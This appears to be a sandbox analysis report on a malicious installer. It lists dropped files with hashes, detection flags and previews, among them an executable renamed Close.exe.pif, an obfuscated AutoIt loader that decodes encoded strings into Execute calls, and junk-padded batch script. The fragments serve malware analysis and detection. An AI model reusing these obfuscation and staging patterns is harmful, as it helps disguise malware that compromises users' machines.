                                                                                                                        Preview:[General]..FileVersion=1.1..FileType=QSetupIniFile..OperatingSystem=..ProcessorNameString=..ComputerRAM=..ProjectDrive=..DateTime=..OutputType=EXE..Language=ENGLISH..ComposerVersion=..License=PRO-MSI....[Project]..ProjectName=1..ProjectDirectory=...NonSFXDirectory=...MediaFileName=1..CopyMediaToFName=..ProgramDescriptiveName=Pm Laura Directions Poll Sf Administrative Homes Funk..ProgramVersion=..CompanyName=..ProgVerLiveUpdate=0..RegisterAsApp=1..RegisterProject=0..LanguageFlag=1..LanguageNames=|..UseNonSFXDir=0..ClrNonSFXDir=0..BuildNonSFXTree=0..CompressNonSFXFiles=0..ForceCopyNonSFXFiles=0..CompressionLevel=9..SetupWillExpire=0..ExpireByDate=0..ExpireByDays=1..ExpireDate=1970-01-01..ExpireDays=90..SpanCDs=0..SpanCDsSize=650..DebugWindow=0..DebugOnThisPC=1..DebugOnEveryPC=0..MSI_UpgradeCode=..MSI_ProductCode=....[Language]....[LanguageShortcut]....[LanguageCustomDLG]....[Display]..AddSetupBackground=0..SetupBackground3D=0..TopLabel=0..TopLabelVer=0..TopLabel2=0..BottomLabel=0..TopLab

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\Setup.txt

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:ASCII text, with very long lines (342), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3012
                                                                                                                        Entropy (8bit):5.562010050615106
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:uR//2KoMtFby+CtXO7gyK3exYfe11TpIIII4Q011SCIII4I76x:uRzbyxagbixwx
                                                                                                                        MD5:F1AB3CBF3A21FEED53791F47D1BE0ACF
                                                                                                                        SHA1:11872E14CDCD534DAD2EC7F1C45121EA76DE352A
                                                                                                                        SHA-256:FF25BE4DCB6AE04229F2320A0B025787BCAAED50A5244D03565DEF3BB0E37CA9
                                                                                                                        SHA-512:3ADC2C5D5225C3E3226F44AD204AA82BDEB2EFA08FD69B6663D2B68E571388A8CAD7F380E0CA379770104E3073AFC9FB57117CEB8D312CF28191342DE7BADD86
                                                                                                                        Malicious:false
                                                                                                                        Preview:..// ====== Project ======..SET_MEDIA_NAME(1);..SET_PROG_NAME(Pm Laura Directions Poll Sf Administrative Homes Funk);..SET_PROJECT_NAME(Reuters);..SET_PROG_VERSION();..SET_COMPANY_NAME();..SET_COMPOSER_BUILD(9.1.0.6);..SET_PC_STAMP({3C73921F-40BF-4364-9C90-67133E4836F7});..SET_DEBUG_LEVEL(0);..SET_MSI_CODES(|{CA35622D-0F46-4F95-B93B-9134B6070471}|{C41F0F9D-105E-49E6-8C44-E83D964EC81D}|);..SET_LANG_FLAG(1);..SET_LANG_NAMES(|);..SET_PAYING_OK_PRO_MSI;....// ====== Language ======....// ====== Language Shortcut ======....// ====== Language Custom Dialogs ======....// ====== Display ======..SET_DIALOG_LOCATION(|Center|0|0|);..SET_DIALOG_STYLE_MODERN..SET_DIALOG_BITMAP_3D_FRAME;..SET_COMPANY_URL();....// ====== Files ======..SET_GROUP_DATA(|Main Group|This is the main group of files|2112|12|2112|12|1|1|1|1|0|00000000|0|)..SET_OVERWRITE_FLAG(0);..SET_SUB_DIR(<Application Folder>);..SET_COPY_FILES(00001#Bosnia|00007#Highlights|00008#Reception|00005#Delegation|00010#Seminars|00009#Sbjct|00006#

                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zsoisce.hcb.psm1

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:very short file (no magic)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:U:U
                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                        Malicious:false
                                                                                                                        Preview:1

                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baqaxnay.10u.ps1

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:very short file (no magic)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:U:U
                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                        Malicious:false
                                                                                                                        Preview:1

                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gf1glkzw.na1.psm1

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:very short file (no magic)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:U:U
                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                        Malicious:false
                                                                                                                        Preview:1

                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrngdh2f.5mx.ps1

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:very short file (no magic)
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):1
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:U:U
                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                        Malicious:false
                                                                                                                        Preview:1

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):947288
                                                                                                                        Entropy (8bit):6.630158288707175
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:7yL1NdEcgjRnuWbIv216yoEGGPve5KIHbaCB+m:7mBrQRFbIcaGPml7aCx
                                                                                                                        MD5:0162A97ED477353BC35776A7ADDFFD5C
                                                                                                                        SHA1:10DB8FE20BBCE0F10517C510EC73532CF6FEB227
                                                                                                                        SHA-256:15600CCDEF5A64B40D206D89234A51BE1E11BD878DCEFC5986590BCF40D9D571
                                                                                                                        SHA-512:9638CAB1AABE78C22A3D3528A391544F697D792640D831516B63FA52C393EE96BB588223E70163D059208CC5A14481C5FF7EF6BA9AC572322798A823D67F01F5
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: 0HYSKx2lH0.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 0HYSKx2lH0.exe, Detection: malicious, Browse
                                                                                                                        • Filename: SecuriteInfo.com.Win32.Malware-gen.3518.18422.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 1NHx8w5m6F.exe, Detection: malicious, Browse
                                                                                                                        • Filename: sZCgzJsxWX.exe, Detection: malicious, Browse
                                                                                                                        • Filename: sZCgzJsxWX.exe, Detection: malicious, Browse
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L....q.b.........."...............................@..................................i....@...@.......@.........................|....P..P............N..X&...0..hv...........................C..........@............................................text.............................. ..`.rdata..............................@..@.data...tp.......H..................@....rsrc...P....P......................@..@.reloc..hv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\m (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        File Type:ASCII text, with very long lines (1201), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1200656
                                                                                                                        Entropy (8bit):4.910402027337674
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:qz3Hvz3jQRsf4XhpdPhrdizsZ6UyI0oFStI0o+hoz3XI0oacqBuBlB9I0ob+zkzk:9XG
                                                                                                                        MD5:C8683A7147F3E27D0F25049ECC369187
                                                                                                                        SHA1:A73B0857331C68F848B5AB8F7C26C6B489CDAE91
                                                                                                                        SHA-256:0FF45C0A72455B1C1BCB1B301FED0E18D9E0E5B30CAD578B56EE033C336494A4
                                                                                                                        SHA-512:0C4CEBB6ED51A35E3C25348B0B33D63709B8A8BE4960712C5F6F015E1D64DA099BDA327BA66FD36BE3176509226ACEFF469ADE815A06FD385791675E6B04E39B
                                                                                                                        Malicious:false
                                                                                                                        Preview:$indicationprogressivesalarydrivingcultures = 301768..$ContestsReliableImpacts = 69..While 9727982..Switch $indicationprogressivesalarydrivingcultures..Case 301767..IsObj(SistersScuba("109d121d115d116d101d114d105d111d117d115d94d68d97d117d103d104d116d101d114d115d94d84d101d97d109d94",0))..Random(101, 949, 0)..Abs(8332309)..Execute(SistersScuba("87d117d118d120d44d58d58d54d53d58d58d53d45",4))..Execute(SistersScuba("73d119d110d123d106d76d106d121d88d106d119d110d102d113d45d44d92d107d118d89d107d109d89d95d90d82d112d80d106d78d115d115d109d44d46",5))..$indicationprogressivesalarydrivingcultures = $indicationprogressivesalarydrivingcultures + 1..Case 301768..Opt(SistersScuba("89d119d102d126d78d104d116d115d77d110d105d106",5), 1)..ExitLoop..Case 301769..Sqrt(1047779)..IsObj(SistersScuba("100d115d102d101d106d117d116d33d33d33d33d85d102d111d33d33d33d33d79d112d110d106d111d98d117d106d112d111d33d33d33d33",1))..$indicationprogressivesalarydrivingcultures = $indicationprogressivesalarydrivingcultures + 1..En

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Andrew (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):112640
                                                                                                                        Entropy (8bit):6.492791018363647
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:Drds/gNGhFcU+IbXCyZJXXxmJ2sL+gYUUOp+ZFA9py+U/KkN:zNGhF0yVmJZYUUOp+yI9b
                                                                                                                        MD5:12B091B9B8AB58EB24B3E221AC1BC977
                                                                                                                        SHA1:6011E0C00338F9484DE488F21E7C8EAA1FBAC527
                                                                                                                        SHA-256:A2F5BDC7FD73557D3C1C2C65920C77CC6405BB763DFE2BE17E7EEA4B55D0A01F
                                                                                                                        SHA-512:4A18CEAA811559854E898C4ECDC6D982CEB4E22540E64E814FA956A463CEE8CB9F727C9A24B5A208DB3ADCF37E83B4B7348505C3E738F339C450C2A8F1156EB9
                                                                                                                        Malicious:false
                                                                                                                        Preview:...g.u...U..Y.N..F......~7.B.j....O...Y.......F..F....u.j.X........P.F..Y...Y....P...b....F.@P.u..6.R......^]...U..VW.}.....Q..A...t..B...t..P.;.u...;N.u..V.Q.}....'..N._^]...U..QQSW....3.E.QQ.x.QQGW.0QQ....I..E...u.........3VP....Y3...E.QQ.u.VW.0QQ....I.HPQV...X...V....Y^_[..U..E.Pj..u..u..u........p....Q.S.......y....].U..E..@....y..u.........u.V.u.........&..F.....^3.]...U......DS.].V...W.t$.....3.3.G..P.{..D$...p.I.;.u...t.I..D$ P..l.I..]..d$(..d$,.j.Xf.D$ .C......................tq.....j....C..p....|P...F....D$..C..p....fP...F....E..@..p....QP...F..8.E..@..0...=P...u..t$.S.F..L$.W.0..........C..H..L$..9v................~6.C........H....;..!.C..H.....L$........D.....D$....d$..j<.....S.Yj).D$ .r....kv....t.3....O...F..S.....2...O...t$..F..L$ S.0..;...D$(.@...x&.M..D$ P.....d$H..L$@P.!...j.3.^......d$8.3..|$<j.......0O...L$..A....E..@..p.....O...F..8.E..@..0....O...u..F.j.S.\$...W.0.d........C..p.....N...F..8.C..0....N...u.j.j.....j<....Y.K....1...N...N.3.

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Bosnia (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):110592
                                                                                                                        Entropy (8bit):6.262208423559642
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:Izy9pl/VxpYjay5SzsP1zCJnIgOyK108GL3TFJ7k:iy9p1pX8Sz4yK1yrk
                                                                                                                        MD5:E334DF859253C2E76D76FCD60E6D21F2
                                                                                                                        SHA1:5FAB4038C6019417CEC266CC189ADB34B7E23690
                                                                                                                        SHA-256:8CE58CF830BCD28E13F9B3B92D67B3474012066E21B81D5C71A82FF3095DCF2A
                                                                                                                        SHA-512:E645F16327B29801FD8446EC09DA74E7434E89463516FEB7E71418A371C51AD0C5F014918BC1B25462141E4D2BC3ADD2439A88E2E3F7271858727E0E60F97A9F
                                                                                                                        Malicious:false
                                                                                                                        Preview:cruzVehicleRespectiveDiane........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L....q.b.........."...............................@..................................i....@...@.......@.........................|....P..P............N..X&...0..hv...........................C..........@............................................text.............................. ..`.rdata..............................@..@.data...tp.......H..................@....rsrc...P....P......................@..@.reloc..hv...0...x..................@..B......................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Brooks (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):58368
                                                                                                                        Entropy (8bit):6.621477277628822
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:aiuOQ/cnFdnIj5Pd4PIagKaTwSx+aPh/e73H5AtgI:xuN/ebIj5Z6bH4GLHatgI
                                                                                                                        MD5:C80856E2B89EB077180E27E799589826
                                                                                                                        SHA1:472E00E8DE6CB0CDD07DD501AA1597EC55D2EB15
                                                                                                                        SHA-256:25C36C2E3A9238E92E7D50BBBA35F661AD04524D3A6DBF43AAABC72D88D4F787
                                                                                                                        SHA-512:213B76CB93AA0F3CA67AEB8DC63D332F76EED45FF3A58B4D3139D0B72F8E5CD160160BD16221C0AF1DE3DA2E2CBCE7F3A2154A403F7C67B50D3934D8978DA6E3
                                                                                                                        Malicious:false
                                                                                                                        Preview:....Vj..H(^.y...L.t.....t.....y..t..Q...t..........u........Z...Y^].j.h..L..z-...e...P......@.L...P...t..wL..uCj..R..Y.e...5..M..GLP.0...YY...u..E............u..K...u.j..R..Y...V-....U..V.u.W..t<.E...t5.8;.u....-V.0....Y..t.W.........Yu....L.t.W.....Y..3._^]..U..M.3....t......SVW........t......t.........t.........t.................t........#.t.;.t.;.t.;.u...`......@...... ......._#.^[......t.......t.;.u......]..@]..@...]..U.....}...=4.M........f.E.3..W......?t)..t.j.Z..t......t......t..... t......t.....]..E.....E...U.E..?t)..t.j.Y..t......t......t..... t......t......_.=f.M.3...?t2...t.j.X...t.......t.......t...... t.......t........]..U......}.f.E.3..t.j.Y..t......t......t..... t......t.......SV.........W.....#.t&......t.......t.;.u.........................t.;.u....................f..t........}....E...#.#...;.......V.?...Yf.E..m...}.f.E.3...t.j.^..t......t......t..... t......t...........#.t*......t.......t.;.u.............................t.......u................

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Bs (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):39936
                                                                                                                        Entropy (8bit):6.6505271873552285
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:7JXoHpMZoKR8RFj5OgEY3zvx5eWzjGa0hGgQCFCojNSXFp:toHpER8RRDTvx596dQCFPja
                                                                                                                        MD5:A592106A23682C9F456959581E555E57
                                                                                                                        SHA1:CDAE6FF10CD8BE861601ABBC5A80ECF6A548AB11
                                                                                                                        SHA-256:A3F12FD6F932A730A1E55FDB0088663770BDAFA71923B5F7A0F30C572122BFF8
                                                                                                                        SHA-512:4838A14984A1D84B28655611A57EE8701AF4A613B084A431419E3B3A96E66452D580C55309CAA5C5F5F684D7862719BFE49637E2CD5CACD3916E706F7C5B06A0
                                                                                                                        Malicious:false
                                                                                                                        Preview:E.Y..u..}..G0.......]...3.......H..-....E...G....C.....C..0...K........u0....t3........f;.r7.............L.........E.,K..<...K.........f;...~0......,.......f;...h0...K. ._0........0...b0...............L.........E.,K..<...K...m0.......f;...a0....,..........f;...K0........C..>0...K......./.......t0...E...U....{....\$X.^@.]8..0..j|_f.8.x.3..|$Lf......G..L$..|$ .D$4..0...L$<.D$D.T$H..x);.u.9T$8t..\$...y..\$8.\$$.L$.....L$<..y...x..L$,..y...T$0.L$,...L$,.T$0.\$...3.....u.9T$$u...T$$.\$....L$...T$..D$..0..3....Q3.f..VQC..#..i..........u..^t.0....xc;NH~..NH.D$Lf...0...}8..L$.t..D$T....L$....D$\..jwXf.....+D$...f.G..B..T$..|$t.T$`....\$(.]8./.....u.j$X..3.......H..-....M....U..D$(..3..0...t$d3.f...D$ ...V...Pj.Z......L$L.....+....PQ.A.P.....T$L......L$....f...G.+......f.B.jxZf.W.f.G.....F$....0...E........{.....3..u..E.....]..93....U..a3..3.]....M.M......3....x.....t..},.u.+w...f+p.f.p..u.3...x....E..@...._...jvXf........B...x...f..+w.j.Y....3.P.f.0f.H..u..U..h1.........M.

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Dat (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                        File Type:ASCII text, with very long lines (1201), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1200656
                                                                                                                        Entropy (8bit):4.910402027337674
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:qz3Hvz3jQRsf4XhpdPhrdizsZ6UyI0oFStI0o+hoz3XI0oacqBuBlB9I0ob+zkzk:9XG
                                                                                                                        MD5:C8683A7147F3E27D0F25049ECC369187
                                                                                                                        SHA1:A73B0857331C68F848B5AB8F7C26C6B489CDAE91
                                                                                                                        SHA-256:0FF45C0A72455B1C1BCB1B301FED0E18D9E0E5B30CAD578B56EE033C336494A4
                                                                                                                        SHA-512:0C4CEBB6ED51A35E3C25348B0B33D63709B8A8BE4960712C5F6F015E1D64DA099BDA327BA66FD36BE3176509226ACEFF469ADE815A06FD385791675E6B04E39B
                                                                                                                        Malicious:false
                                                                                                                        Preview:$indicationprogressivesalarydrivingcultures = 301768..$ContestsReliableImpacts = 69..While 9727982..Switch $indicationprogressivesalarydrivingcultures..Case 301767..IsObj(SistersScuba("109d121d115d116d101d114d105d111d117d115d94d68d97d117d103d104d116d101d114d115d94d84d101d97d109d94",0))..Random(101, 949, 0)..Abs(8332309)..Execute(SistersScuba("87d117d118d120d44d58d58d54d53d58d58d53d45",4))..Execute(SistersScuba("73d119d110d123d106d76d106d121d88d106d119d110d102d113d45d44d92d107d118d89d107d109d89d95d90d82d112d80d106d78d115d115d109d44d46",5))..$indicationprogressivesalarydrivingcultures = $indicationprogressivesalarydrivingcultures + 1..Case 301768..Opt(SistersScuba("89d119d102d126d78d104d116d115d77d110d105d106",5), 1)..ExitLoop..Case 301769..Sqrt(1047779)..IsObj(SistersScuba("100d115d102d101d106d117d116d33d33d33d33d85d102d111d33d33d33d33d79d112d110d106d111d98d117d106d112d111d33d33d33d33",1))..$indicationprogressivesalarydrivingcultures = $indicationprogressivesalarydrivingcultures + 1..En

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Delegation (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4096
                                                                                                                        Entropy (8bit):6.076710803132604
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:cMykUJEh7VmDcaO4VKoCRLVcZVJRBVGqoVg5gzkqHvAAr7DeaZFa:cMMDcP8mrRrWaG
                                                                                                                        MD5:7FA71A3B5C58C81C536ADDA3CB9A462C
                                                                                                                        SHA1:F69D42FE8D8D28AEB148B95C3BFA86AE33D289D7
                                                                                                                        SHA-256:F31694E132632CC1B79154EFA8A4D7581D3A9B56D3F90396C5C54D4A65BE947F
                                                                                                                        SHA-512:88CBC24B990E9FA9342F2DE30D9E37D0900DB2815AD6A99420A65ED6FB6F5BDFF16BFB79006D406902B8BCA9F1F2D4FDF9A4B59F89F2A24AE126EDA492D9DB2D
                                                                                                                        Malicious:false
                                                                                                                        Preview:.A.M.;.~.......}......;.......;~|......................FD...........M...B.}.;.~............:...$.G.E..}..E...............N|;........V...t..F.j.PQ............./....,.V....+.;.w f..f;F4u..........f.G.f;F6.............t1.G.;F|r).~..u#.~..u.f..f;F4u..Fh..............9...E....M.@.}..E.;...U.........F|..}.+.;.v@.............;............Fh.............o....H9...F|..}.+.;.w....M.}......}......;........N|;.s........}....w't....t?.............';.s-f.?.u'....}...=....t................~l.......B;U.~..)....}......9M.......;~|..#..........}.=....w4......=....w.................. .......D=......}....7=_ ..w%..n...=. ..r#=. ....\...=/ ....Q.....=.0....D...A;M...r....M......}......9M...'...;~|..|..........}.=....w(tY=....w.tP...tK.. .......@=...........3=_ ..w!t*=. ........=. ..v.=/ ..........=.0........A;M.~..M.......}......9M.......;~|.............}.=....w...o......r......a.....=( ..r.=) ....M...A;M.~..M......}......9M...4...;~|.............}.=....w.t.............................A;M.~.M..?.

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Furthermore (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):137216
                                                                                                                        Entropy (8bit):5.735232870270804
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:uibD8anHsWccd0vtmgMbFuz08QuklMBNIi9uLaAwuaP6:V38QLeAg0Fuz08XvBNbSaAtaP6
                                                                                                                        MD5:5E999830BA1A0373F7DB208859FF3A4C
                                                                                                                        SHA1:0CA6D5C90590C77360569573FE30A47624C5133B
                                                                                                                        SHA-256:35F27FF81D731687B932B136C9654DB8F734082FC25613453D03C940D11031C1
                                                                                                                        SHA-512:B430221E13A1EC690DF3F2C43611835F168CC0511E64D7116AB9A40BBD380CCD755090511034AEA15BEBB3058BB127709A2D396851D41148E65B3FFEFC6D43F9
                                                                                                                        Malicious:false
                                                                                                                        Preview:H.I.D.E...P.R.O.C.E.S.S.L.I.S.T...W.I.N.G.E.T.S.T.A.T.E...S.T.R.I.N.G.U.P.P.E.R...P.R.O.G.R.E.S.S.O.F.F...F.I.L.E.G.E.T.S.I.Z.E...S.E.T.E.X.T.E.N.D.E.D...W.I.N.S.E.T.O.N.T.O.P...W.I.N.S.E.T.S.T.A.T.E...T.R.A.Y.S.E.T.I.C.O.N...G.U.I.S.E.T.C.O.O.R.D...W.I.N.S.E.T.T.I.T.L.E...S.T.R.I.N.G.L.O.W.E.R...I.S.D.L.L.S.T.R.U.C.T...S.T.R.I.N.G.R.I.G.H.T...M.E.M.G.E.T.S.T.A.T.S...G.U.I.C.T.R.L.R.E.A.D...U.D.P.S.H.U.T.D.O.W.N...D.R.I.V.E.S.T.A.T.U.S...W.I.N.G.E.T.T.I.T.L.E...S.T.R.I.N.G.I.N.S.T.R...F.T.P.S.E.T.P.R.O.X.Y...F.I.L.E.D.E.L.E.T.E.....V.A.R.G.E.T.T.Y.P.E.....T.C.P.S.T.A.R.T.U.P.....F.I.L.E.S.E.T.P.O.S.....F.I.L.E.E.X.I.S.T.S.....S.T.D.I.O.C.L.O.S.E.....P.R.O.G.R.E.S.S.O.N.....F.I.L.E.S.E.T.E.N.D.....R.E.G.E.N.U.M.K.E.Y.....D.I.R.G.E.T.S.I.Z.E.....R.E.G.E.N.U.M.V.A.L.....S.T.D.I.N.W.R.I.T.E.....G.U.I.S.E.T.H.E.L.P.....F.I.L.E.G.E.T.P.O.S.....I.S.D.E.C.L.A.R.E.D.....T.C.P.C.O.N.N.E.C.T.....B.L.O.C.K.I.N.P.U.T.....S.T.D.E.R.R.R.E.A.D.....W.I.N.G.E.T.T.E.X.T.....M.O.U.S.E.W.H.E.E.L.....G.U.I.

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Highlights (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                        File Type:ASCII text, with very long lines (1704), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):14948
                                                                                                                        Entropy (8bit):5.791308193778568
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:jmO56scI1GxSLtyfNFKk+AY3jI4LHRCW0ArKI4LgRCW0ArvdH+hUHX18wsuaiZeQ:fYxqH3
                                                                                                                        MD5:01AB43C82FE07A5AB4842D0A311C7A2E
                                                                                                                        SHA1:CACB2006AC19B30D7B6005EDF46C617C68632B12
                                                                                                                        SHA-256:F77EE5A49CE6092F5027B9E7A7D4036DBC6021519323B737A2BD515117750197
                                                                                                                        SHA-512:04032F44433CCE9311CDBAFBF79B1FF9A329AE7871B15A1FA53A4E0926C4CD5F822C3B4F66FAAE6C9B8403B329724E777E1A28D06D647F058F7B8EB2318AD7BB
                                                                                                                        Malicious:false
                                                                                                                        Preview:Set AXblGwibaCngTujDOJiFzXSoldAUJFAlK=y..pFuUpaIdEr=bBXAvoDZOCyfqfAjNN..hEpyeXHOXh=HhyPTZXopsGKVmrduEJuUDDP..hcUDPzGMrVSpkvAfFEJGThFYGB=guQrKfYFDeFzY..YSDkiVioQf=ToXqPVXhpaFjRiUjRWjqlLGVxeMmG..ydBtRuwENi=uPIaFMtjIdkEgPiCwFNobHu..fKNdNkjptatWYC=fIjXLULjfJEZYZYlnIvrUYNnb..emWKkDmQnml=xsEnnGpjhpuoGhCnTdUOAHS..dEnqmiBnZNhtmv=iglQTzOtXwqXiFvpNmai..opMyHHoSqbZbPNmfRZSBmAYnlxT=DAEugHYynKkLFjXDwmsRX..Set WAAGzHlhUjOGgmTSooOzRuNuWhCxbLrwFJDtGIhsVkPZXZX=v..osorDrPNzJyyPPppMqEVOjmV=nGdNpWdtKfzUYeGOdjY..kycGQlYaBVVSh=tbmZlNPqyAQgNYYibqANkz..KXYYYCOzAHzYpg=wkakqUPBbqxxbVsA..KjOejPRbdufGxZOTu=gxZzdUcBXDodbpuZgXmgPvBOJNmVe..FAsXryxsWU=KRhgqIuAcLRzSoSTkKCxAm..YHZAuqEWwFHtFgmItzcGfNimOkjo=zmukVgGwoqmQOQNlrjFLwb..ySGlAAMVOv=HuBTJZSHWzWQBXzg..Set YHvFWbwzftuAvyKxnoHJlDGSzAIpeyjukwWuZKKImAxU=e..AhkcePMFAxwE=cPSslRqfcoExOb..pKpLuhZxYGebzGACtcnfTHpleLRyy=wgsOcQkdbYvcTKixGIUFAZ..oyCBZIxvUgsFOuF=JsNXASbNneIyol..ywYoJTfjHeBBiCyzgwb=gMwOfHOeWqfgJO..DPXVszyuVYsdka=xrKZkzqpSwtjfGNhRafCDdy..RpGuPYsDKjGk=KDSDGtUhiP

